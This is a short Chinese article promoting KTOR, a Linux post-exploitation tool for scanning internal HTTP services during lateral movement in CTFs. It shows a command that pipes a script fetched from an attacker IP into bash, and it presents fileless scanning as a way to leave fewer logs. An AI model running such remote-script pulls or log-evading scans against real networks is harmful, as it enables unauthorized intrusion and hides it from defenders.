当前位置: 首页 > article >正文

KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具

地址:https://github.com/MartinxMax/KTOR

简介

KTOR 是一款专为 Linux 横向渗透设计的工具。通过该工具,您可以快速扫描内部 HTTP 服务,以便进一步进行网络渗透,且实现无文件落地扫描。

在CTF中通常需要利用本地其他端口HTTP服务或其他主机的HTTP服务来横向移动权限提升。

在获取靶机低权限后通常需要对内部网络进一步探测,而且通过端口转发后再扫描过于耗费时间,为了解决这一缺陷,KTOR来预先探测存在HTTP服务的机器,利用curl命令实现无文件落地扫描,减少日志产生。

使用方法

$ ./ktor.sh -h

请添加图片描述

扫描本地主机HTTP服务

$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all

请添加图片描述

指定网卡扫描内网HTTP服务

请添加图片描述


http://www.kler.cn/a/540519.html

相关文章:

  • c语言函数学习
  • 2 CXX-Qt #[cxx_qt::bridge] 宏指南
  • 基于 Python(Flask)、JavaScript、HTML 和 CSS 实现前后端交互的详细开发过程
  • Jenkins数据备份到windows FTP服务器
  • FFmpeg(一) 简介
  • c++ haru生成pdf输出饼图
  • 基于Python的人工智能驱动基因组变异算法:设计与应用(下)
  • LeetCodehot 力扣热题100 验证二叉搜索树
  • 图论——环检测
  • 网络分析工具—WireShark的安装及使用
  • Git 与持续集成 / 持续部署(CI/CD)的集成
  • 机器视觉3D相机分哪些
  • Visual Studio踩过的坑
  • 如何跟踪你WordPress网站的SEO变化
  • Spring Boot比Spring多哪些注解?
  • electron中主进程和渲染进程通信3种方式【详细教程】
  • macOS 上部署 RAGFlow
  • 【Hadoop】大数据权限管理工具Ranger2.1.0编译
  • 在spring boot 项目中远程调用时,如果使用subList()方法报错原因分析
  • CNN-GRU卷积神经网络门控循环单元多变量多步预测,光伏功率预测(Matlab完整源码和数据)
  • python视频爬虫
  • 定制化APP:开启企业数字化转型新未来
  • 15 大 AWS 服务
  • 比亚迪发布智能化战略,天神之眼开创全民智驾
  • 工厂方法模式详解(Java)
  • Vue 和 React 的生态系统有哪些主要区别